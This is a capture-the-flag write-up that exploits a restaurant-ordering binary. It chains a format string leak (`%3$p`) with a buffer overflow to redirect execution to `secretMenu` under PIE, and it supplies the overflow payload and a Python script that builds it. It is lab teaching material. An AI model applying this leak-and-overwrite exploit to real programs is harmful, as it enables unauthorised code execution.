Tags: pwn 


## **The Thought Process**

The target program is simple. First, you are prompted for your order. Your order is then repeated back to you (exactly, character for character) and you are prompted to enter your payment information. The binary is available for download, so we can run tests on our local machine.

Our input for the first prompt being echoed back to us verbatim suggests that there may be a format string vulnerability in the print statement following the first input. Entering a bunch of format specifiers (such as `%p %p %p`) confirms our suspicion: the program spits out a bunch of hex values, one of which looks like a code address!

Additionally, the program seems to be susceptible to a buffer overflow. We figure this out by spamming a ton of characters for our input and getting a segmentation fault when running the binary locally. We can find exactly how many bytes are needed to reach the return address by spamming "AAAABBBBCCCCDDDD...ZZZZ" and seeing what the program tries to jump to. For instance, if we segfault at address 0x48484848 (0x48 is ASCII "H"), the "HHHH" in our spam overwrote the return address.

Lastly, the binary is compiled with PIE (Position Independent Executable), as the description suggests. This means the binary is loaded at a random base address on every execution (when the system has ASLR enabled), so code addresses change from run to run.

So with all these facts laid out - how can we get the flag? Opening the binary in gdb and running `info func` reveals a tasty-looking function: `secretMenu`. We most likely have to overwrite the return address of the `runRestaurant` function with the address of `secretMenu` using the buffer overflow vulnerability.

Because the binary was compiled with PIE, the address of `secretMenu` changes on every run! Fortunately, we can use the format string vulnerability in the first input to leak a code address, which we can then use to calculate the address of `secretMenu`. Since PIE only shifts the base address, the distance between any two code addresses stays the same across runs. We end up discovering that the address leaked by `%3$p` is 0xcf bytes below `secretMenu`, so we can overwrite the return address of `runRestaurant` with `leak + 0xcf`.

## **The Payload**

The Order: `%3$p` - This leaks a code address that we use to calculate the address of `secretMenu`.

The Payment: `AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWW[secretMenuAddr]`

If we found the address of `secretMenu` to be 0x56551234, for example, we replace `[secretMenuAddr]` with the little-endian byte string `\x34\x12\x55\x56`.

`pwntools` is a useful Python library for connecting to remote servers (as you would with netcat), reading what the remote server prints, and sending payloads.
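The arithmetic in this write-up carried through in plain Python, as an added example rather than the author's own solve script: it uses only the standard library, assumes a 32-bit little-endian target (as the four-byte addresses above imply), and the echoed order string it parses is a constructed sample.

```python
import re
import struct

# Distance from the %3$p leak to secretMenu, as measured in the write-up.
SECRET_MENU_DELTA = 0xcf
# "AAAABBBB...WWWW": 23 letters x 4 bytes = 92 bytes of padding before the saved return address.
PADDING = b"".join(bytes([c]) * 4 for c in range(ord("A"), ord("W") + 1))


def return_address_offset(fault_address: int) -> int:
    """Map a crash address such as 0x48484848 back to the byte offset of the
    four-letter group ("HHHH") that landed in the saved return address."""
    b = fault_address.to_bytes(4, "little")
    if len(set(b)) != 1 or not ord("A") <= b[0] <= ord("Z"):
        raise ValueError("fault address is not a repeated pattern letter")
    return (b[0] - ord("A")) * 4


def parse_leak(order_echo: str) -> int:
    """Extract the pointer the program prints back when the order was `%3$p`."""
    m = re.search(r"0x[0-9a-fA-F]+", order_echo)
    if m is None:
        raise ValueError("no pointer found in echoed order")
    return int(m.group(0), 16)


def secret_menu_address(leak: int) -> int:
    """The leak sits 0xcf bytes below secretMenu; PIE shifts both equally."""
    return leak + SECRET_MENU_DELTA


def build_payment(leak: int) -> bytes:
    """Padding up to the saved return address, then secretMenu packed little-endian."""
    return PADDING + struct.pack("<I", secret_menu_address(leak))


if __name__ == "__main__":
    # Constructed sample of what the echoed order might look like on one run.
    sample_echo = "Your order: 0x56551165\n"
    leak = parse_leak(sample_echo)
    payment = build_payment(leak)
    print(hex(secret_menu_address(leak)), len(payment), payment[-4:].hex())
```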